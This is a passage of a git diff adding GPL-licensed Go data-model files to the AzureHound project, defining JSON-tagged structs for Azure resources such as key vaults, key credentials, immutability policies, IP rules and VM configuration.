group. + // Required. + // Returned by default. + // Supports $filter (eq, ne, NOT, in). + SecurityEnabled bool `json:"securityEnabled,omitempty"` + + // Security identifier of the group, used in Windows scenarios. + // Returned by default. + SecurityIdentifier string `json:"securityIdentifier,omitempty"` + + // Specifies a Microsoft 365 group's color theme. Possible values are Teal, Purple, Green, Blue, Pink, Orange or Red + Theme string `json:"theme,omitempty"` + + // Count of conversations that have received new posts since the signed-in user last visited the group. + // Returned only on $select for GET /groups/{ID} + UnseenCount int32 `json:"unseenCount,omitempty"` + + // Specifies the group join policy and group content visibility for groups. + // Possible values are: Private, Public, or Hiddenmembership. + // Hiddenmembership can be set only for Microsoft 365 groups, when the groups are created. + // It can't be updated later. Other values of visibility can be updated after group creation. + // If visibility value is not specified during group creation on Microsoft Graph, a security group is created as + // Private by default and Microsoft 365 group is Public. Groups assignable to roles are always Private. + // Returned by default. + // Nullable. + Visibility enums.GroupVisibility `json:"visibility,omitempty"` +} diff --git a/models/azure/hardware_profile.go b/models/azure/hardware_profile.go new file mode 100644 index 0000000..e63a5fc --- /dev/null +++ b/models/azure/hardware_profile.go @@ -0,0 +1,40 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the hardware settings for the virtual machine. +type HardwareProfile struct { + + // Specifies the size of the virtual machine. + // + // Recommended way to get the list of available sizes is using the API: + // - List all available virtual machine sizes in an availability set + // - List all available virtual machine sizes in a region + // - List all available virtual machine sizes for resizing. + // + // For more information about virtual machine sizes, see Sizes for virtual machines. + // + // The available VM sizes depend on region and availability set. + VMSize string `json:"vmSize,omitempty"` + + // Specifies the properties for customizing the size of the virtual machine. Minimum api-version: 2021-07-01. + // + // This feature is still in preview mode and is not supported for VirtualMachineScaleSet. + // Please follow the instructions in VM Customization for more details. + VMSizeProperties VMSizeProperties `json:"vmSizeProperties,omitempty"` +} diff --git a/models/azure/hosting_environment_profile.go b/models/azure/hosting_environment_profile.go new file mode 100644 index 0000000..805b2df --- /dev/null +++ b/models/azure/hosting_environment_profile.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type HostingEnvironmentProfile struct { + Id string `json:"id,omitempty"` + Name string `json:"name,omitempty"` + Type string `json:"type,omitempty"` +} diff --git a/models/azure/hostname_ssl_state.go b/models/azure/hostname_ssl_state.go new file mode 100644 index 0000000..bddaa28 --- /dev/null +++ b/models/azure/hostname_ssl_state.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type HostNameSslState struct { + HostType enums.HostType `json:"hostType,omitempty"` + Name string `json:"name,omitempty"` + SSLState enums.SslState `json:"sslState,omitempty"` + Thumbprint string `json:"thumbprint,omitempty"` + ToUpdate bool `json:"toUpdate,omitempty"` + VirtualIP string `json:"virtualIP,omitempty"` +} diff --git a/models/azure/image_reference.go b/models/azure/image_reference.go new file mode 100644 index 0000000..05b4f4a --- /dev/null +++ b/models/azure/image_reference.go @@ -0,0 +1,50 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies information about the image to use. You can specify information about platform images, marketplace images, +// or virtual machine images. This element is required when you want to use a platform image, marketplace image, or +// virtual machine image, but is not used in other creation operations. +// NOTE: Image reference publisher and offer can only be set when you create the scale set. +type ImageReference struct { + // Specifies in decimal numbers, the version of platform image or marketplace image used to create the virtual + // machine. This readonly field differs from 'version', only if the value specified in 'version' field is 'latest'. + ExactVersion string `json:"exactVersion,omitempty"` + + // Resource ID. + Id string `json:"id,omitempty"` + + // Specifies the offer of the platform image or marketplace image used to create the virtual machine. + Offer string `json:"offer,omitempty"` + + // The image publisher + Publisher string `json:"publisher,omitempty"` + + // Specified the shared gallery image unique id for vm deployment. + // This can be fetched from shared gallery image GET call. + SharedGalleryImageId string `json:"sharedGalleryImageId,omitempty"` + + // The image SKU. + Sku string `json:"sku,omitempty"` + + // Specifies the version of the platform image or marketplace image used to create the virtual machine. + // The allowed formats are Major.Minor.Build or 'latest'. Major, Minor, and Build are decimal numbers. + // Specify 'latest' to use the latest version of an image available at deploy time. Even if you use 'latest', + // the VM image will not automatically update after deploy time even if a new version becomes available. + Version string `json:"version,omitempty"` +} diff --git a/models/azure/immutability_policy.go b/models/azure/immutability_policy.go new file mode 100644 index 0000000..febe7ac --- /dev/null +++ b/models/azure/immutability_policy.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ImmutabilityPolicy struct { + Etag string `json:"etag,omitempty"` + Properties ImmutabilityPolicyProperties `json:"properties,omitempty"` + UpdateHistory ImmutablePolicyUpdateHistory `json:"updateHistory,omitempty"` +} diff --git a/models/azure/immutability_policy_properties.go b/models/azure/immutability_policy_properties.go new file mode 100644 index 0000000..7fea6d2 --- /dev/null +++ b/models/azure/immutability_policy_properties.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type ImmutabilityPolicyProperties struct { + AllowProtectedAppendWrites bool `json:"allowProtectedAppendWrites,omitempty"` + AllowProtectedAppendWritesAll bool `json:"allowProtectedAppendWritesAll,omitempty"` + ImmutabilityPeriodSinceCreationInDays int `json:"immutabilityPeriodSinceCreationInDays,omitempty"` + State enums.ImmutabilityPolicyState `json:"updateHistory,omitempty"` +} diff --git a/models/azure/immutable_policy_update_history.go b/models/azure/immutable_policy_update_history.go new file mode 100644 index 0000000..d4110ef --- /dev/null +++ b/models/azure/immutable_policy_update_history.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type ImmutablePolicyUpdateHistory struct { + AllowProtectedAppendWrites bool `json:"allowProtectedAppendWrites,omitempty"` + AllowProtectedAppendWritesAll bool `json:"allowProtectedAppendWritesAll,omitempty"` + ImmutabilityPeriodSinceCreationInDays int `json:"immutabilityPeriodSinceCreationInDays,omitempty"` + ObjectIdentifier string `json:"objectIdentifier,omitempty"` + TenantId string `json:"tenantId,omitempty"` + Timestamp string `json:"timestamp,omitempty"` + Update enums.ImmutabilityPolicyUpdateType `json:"update,omitempty"` + Upn string `json:"upn,omitempty"` +} diff --git a/models/azure/immutable_storage_account.go b/models/azure/immutable_storage_account.go new file mode 100644 index 0000000..6ef2b8b --- /dev/null +++ b/models/azure/immutable_storage_account.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type ImmutableStorageAccount struct { + Enabled bool `json:"enabled,omitempty"` + ImmutabilityPolicy AccountImmutabilityPolicyProperties `json:"immutabilityPolicy,omitempty"` +} + +type AccountImmutabilityPolicyProperties struct { + AllowProtectedAppendWrites bool `json:"allowProtectedAppendWrites,omitempty"` + ImmutabilityPeriodSinceCreationInDays int `json:"immutabilityPeriodSinceCreationInDays,omitempty"` + State enums.AccountImmutabilityPolicyState `json:"state,omitempty"` +} diff --git a/models/azure/immutable_storage_with_versioning.go b/models/azure/immutable_storage_with_versioning.go new file mode 100644 index 0000000..43a314c --- /dev/null +++ b/models/azure/immutable_storage_with_versioning.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type ImmutableStorageWithVersioning struct { + Enabled bool `json:"enabled,omitempty"` + MigrationState enums.MigrationState `json:"migrationState,omitempty"` + TimeStamp string `json:"timeStamp,omitempty"` +} diff --git a/models/azure/implicit_grant_settings.go b/models/azure/implicit_grant_settings.go new file mode 100644 index 0000000..e17b472 --- /dev/null +++ b/models/azure/implicit_grant_settings.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies whether this web application can request tokens using the OAuth 2.0 implicit flow. Separate properties are +// available to request ID and access tokens as part of the implicit flow. To enable implicit flow, at least one of the +// following properties must be set to true. +type ImplicitGrantSettings struct { + // Specifies whether this web application can request an ID token using the OAuth 2.0 implicit flow. + EnableIdTokenIssuance bool `json:"enableIdTokenIssuance,omitempty"` + + // Specifies whether this web application can request an access token using the OAuth 2.0 implicit flow. + EnableAccessTokenIssuance bool `json:"enableAccessTokenIssuance,omitempty"` +} diff --git a/models/azure/informational_url.go b/models/azure/informational_url.go new file mode 100644 index 0000000..d4f7ea0 --- /dev/null +++ b/models/azure/informational_url.go @@ -0,0 +1,37 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Basic profile information of the application. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/informationalurl?view=graph-rest-1.0 +type InformationalUrl struct { + // CDN URL to the application's logo, Read-only. + LogoUrl string `json:"logoUrl,omitempty"` + + // Link to the application's marketing page. For example, https://www.contoso.com/app/marketing + MarketingUrl string `json:"marketingUrl,omitempty"` + + // Link to the application's privacy statement. For example, https://www.contoso.com/app/privacy + PrivacyStatementUrl string `json:"privacyStatementUrl,omitempty"` + + // Link to the application's support page. For example, https://www.contoso.com/app/support + SupportUrl string `json:"supportUrl,omitempty"` + + // Link to the application's terms of service statement. For example, https://www.contoso.com/app/termsofservice + TermsOfServiceUrl string `json:"termsOfServiceUrl,omitempty"` +} diff --git a/models/azure/instance_view_status.go b/models/azure/instance_view_status.go new file mode 100644 index 0000000..8665276 --- /dev/null +++ b/models/azure/instance_view_status.go @@ -0,0 +1,37 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type InstanceViewStatus struct { + // The status code. + Code string `json:"code,omitempty"` + + // The short localizable label for the status. + DisplayStatus string `json:"displayStatus,omitempty"` + + // The level code. + Level enums.StatusLevel `json:"level,omitempty"` + + // The detailed status message, including for alerts and error messages. + Message string `json:"message,omitempty"` + + // The time of the status. + Time string `json:"time,omitempty"` +} diff --git a/models/azure/ip_rule.go b/models/azure/ip_rule.go new file mode 100644 index 0000000..481b5df --- /dev/null +++ b/models/azure/ip_rule.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// A rule governing the accessibility of a vault from a specific ip address or ip range. +type IPRule struct { + // An IPv4 address range in CIDR notation, such as '124.56.78.91' (simple IP address) + // or '124.56.78.0/24' (all addresses that start with 124.56.78). + Value string `json:"value,omitempty"` +} diff --git a/models/azure/ip_security_restriction.go b/models/azure/ip_security_restriction.go new file mode 100644 index 0000000..414d6d2 --- /dev/null +++ b/models/azure/ip_security_restriction.go @@ -0,0 +1,34 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type IpSecurityRestriction struct { + Action string `json:"action,omitempty"` + Description string `json:"description,omitempty"` + Headers interface{} `json:"headers,omitempty"` + IpAddress string `json:"ipAddress,omitempty"` + Name string `json:"name,omitempty"` + Priority int `json:"priority,omitempty"` + SubnetMask string `json:"subnetMask,omitempty"` + SubnetTrafficTag int `json:"subnetTrafficTag,omitempty"` + Tag enums.IpFilterTag `json:"tag,omitempty"` + VnetSubnetResourceId string `json:"vnetSubnetResourceId,omitempty"` + VnetTrafficTag int `json:"vnetTrafficTag,omitempty"` +} diff --git a/models/azure/key_credential.go b/models/azure/key_credential.go new file mode 100644 index 0000000..e81bdef --- /dev/null +++ b/models/azure/key_credential.go @@ -0,0 +1,56 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/gofrs/uuid" + +// Contains a key credential associated with an application. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/keycredential?view=graph-rest-1.0 +type KeyCredential struct { + // Custom key identifier + // Base64Url encoded. + CustomKeyIdentifier string `json:"customKeyIdentifier,omitempty"` + + // Friendly name for the key. + // Optional. + DisplayName string `json:"displayName,omitempty"` + + // The date and time at which the credential expires. + // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + EndDateTime string `json:"endDateTime,omitempty"` + + // The certificate's raw data in byte array converted to Base64 string; + // For example, [System.Convert]::ToBase64String($Cert.GetRawCertData()). + // Base64Url encoded. + Key []byte `json:"key,omitempty"` + + // The unique identifier (GUID) for the key. + KeyId uuid.UUID `json:"keyId,omitempty"` + + // The date and time at which the credential becomes valid.The Timestamp type represents date and time information + // using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + StartDateTime string `json:"startDateTime,omitempty"` + + // The type of key credential; for example, Symmetric. + Type string `json:"type,omitempty"` + + // A string that describes the purpose for which the key can be used; for example, Verify. + Usage string `json:"usage,omitempty"` +} diff --git a/models/azure/key_value.go b/models/azure/key_value.go new file mode 100644 index 0000000..a814ba5 --- /dev/null +++ b/models/azure/key_value.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type KeyValue struct { + Key string `json:"key,omitempty"` + Value string `json:"value,omitempty"` +} diff --git a/models/azure/key_vault.go b/models/azure/key_vault.go new file mode 100644 index 0000000..0588310 --- /dev/null +++ b/models/azure/key_vault.go @@ -0,0 +1,58 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +// Resource information with extended details. +type KeyVault struct { + Entity + + // Azure location of the key vault resource. + Location string `json:"location,omitempty"` + + // Name of the key vault resource. + Name string `json:"name,omitempty"` + + // Properties of the vault + Properties VaultProperties `json:"properties,omitempty"` + + // Tags assigned to the key vault resource. + Tags map[string]string `json:"tags,omitempty"` + + // Resource type. + Type string `json:"type,omitempty"` +} + +func (s KeyVault) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s KeyVault) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/key_vault_key_ref.go b/models/azure/key_vault_key_ref.go new file mode 100644 index 0000000..871bf9a --- /dev/null +++ b/models/azure/key_vault_key_ref.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a reference to a Key Vault Key +type KeyVaultKeyReference struct { + // The URL referencing a key encryption key in Key Vault. + KeyUrl string `json:"keyUrl,omitempty"` + + // The relative URL of the Key Vault containing the key. + SourceVault SubResource `json:"sourceVault,omitempty"` +} diff --git a/models/azure/key_vault_secret_ref.go b/models/azure/key_vault_secret_ref.go new file mode 100644 index 0000000..603487b --- /dev/null +++ b/models/azure/key_vault_secret_ref.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a reference to a Key Vault Secret. +type KeyVaultSecretReference struct { + // The URL referencing a secret in a Key Vault. + SecretUrl string `json:"secretUrl,omitempty"` + + // The relative URL of the Key Vault containing the secret. + SourceVault SubResource `json:"sourceVault,omitempty"` +} diff --git a/models/azure/keyvault_permissions.go b/models/azure/keyvault_permissions.go new file mode 100644 index 0000000..e76aba9 --- /dev/null +++ b/models/azure/keyvault_permissions.go @@ -0,0 +1,33 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Permissions the identity has for keys, secrets, certificates and storage. +type KeyVaultPermissions struct { + // Permissions to certificates + Certificates []string `json:"certificates,omitempty"` + + // Permissions to keys + Keys []string `json:"keys,omitempty"` + + // Permissions to secrets + Secrets []string `json:"secrets,omitempty"` + + // Permissions to storage accounts + Storage []string `json:"storage,omitempty"` +} diff --git a/models/azure/last_patch_installation_summary.go b/models/azure/last_patch_installation_summary.go new file mode 100644 index 0000000..2a2122c --- /dev/null +++ b/models/azure/last_patch_installation_summary.go @@ -0,0 +1,60 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Describes the properties of the last installed patch summary. +type LastPatchInstallationSummary struct { + // The errors that were encountered during execution of the operation. The details array contains the list of them. + Error ODataError `json:"error,omitempty"` + + // The number of all available patches but excluded explicitly by a customer-specified exclusion list match. + ExcludedPatchCount int `json:"excludedPatchCount,omitempty"` + + // The count of patches that failed installation. + FailedPatchCount int `json:"failedPatchCount,omitempty"` + + // The activity ID of the operation that produced this result. It is used to correlate across CRP and extension logs. + InstallationActivityId string `json:"installationActivityId,omitempty"` + + // The count of patches that successfully installed. + InstalledPatchCount int `json:"installedPatchCount,omitempty"` + + // The UTC timestamp when the operation began. + LastModifiedTime string `json:"lastModifiedTime,omitempty"` + + // Describes whether the operation ran out of time before it completed all its intended actions. + MaintenanceWindowExceeded bool `json:"maintenanceWindowExceeded,omitempty"` + + // The number of all available patches but not going to be installed because it didn't match a classification or + // inclusion list entry. + NotSelectedPatchCount int `json:"notSelectedPatchCount,omitempty"` + + // The number of all available patches expected to be installed over the course of the patch installation operation. + PendingPatchCount int `json:"pendingPatchCount,omitempty"` + + // The UTC timestamp when the operation began. + StartTime string `json:"startTime,omitempty"` + + // The overall success or failure status of the operation. It remains "InProgress" until the operation completes. + // At that point it will become "Unknown", "Failed", "Succeeded", or "CompletedWithWarnings." + Status enums.PatchStatus `json:"status,omitempty"` +} diff --git a/models/azure/license_assignment_state.go b/models/azure/license_assignment_state.go new file mode 100644 index 0000000..5e1850e --- /dev/null +++ b/models/azure/license_assignment_state.go @@ -0,0 +1,48 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Provides details about license assignments to a user. +type LicenseAssignmentState struct { + // The id of the group that assigns this license. If direct-assigned this field will be null. + // + // Read-only + AssignedByGroup string `json:"assignedByGroup,omitempty"` + + // The service plans that are disabled in this assignment. + // + // Read-only + DisabledPlans string `json:"disabledPlans,omitempty"` + + // License assignment failure error. + Error enums.LicenseError `json:"error,omitempty"` + + // The unique identifier for the SKU + // + // Read-only + SkuId string `json:"skuId,omitempty"` + + // Indicates the current state of this assignment. + // + // Read-only + State enums.LicenseState `json:"state,omitempty"` +} diff --git a/models/azure/linux_config.go b/models/azure/linux_config.go new file mode 100644 index 0000000..acee070 --- /dev/null +++ b/models/azure/linux_config.go @@ -0,0 +1,36 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the Linux operating system settings on the virtual machine. +// For a list of supported Linux distributions, see Linux on Azure-Endorsed Distributions. +type LinuxConfiguration struct { + // Specifies whether password authentication should be disabled. + DisablePasswordAuthentication bool `json:"disablePasswordAuthentication,omitempty"` + + // [Preview Feature] Specifies settings related to VM Guest Patching on Linux. + PatchSettings LinuxPatchSettings `json:"patchSettings,omitempty"` + + // Indicates whether virtual machine agent should be provisioned on the virtual machine. + // When this property is not specified in the request body, default behavior is to set it to true. This will ensure + // that VM Agent is installed on the VM so that extensions can be added to the VM later. + ProvisionVMAgent bool `json:"provisionVMAgent,omitempty"` + + // Specifies the ssh key configuration for a Linux OS. + Ssh SshConfiguration `json:"ssh,omitempty"` +} diff --git a/models/azure/linux_patch_settings.go b/models/azure/linux_patch_settings.go new file mode 100644 index 0000000..8b64672 --- /dev/null +++ b/models/azure/linux_patch_settings.go @@ -0,0 +1,33 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free 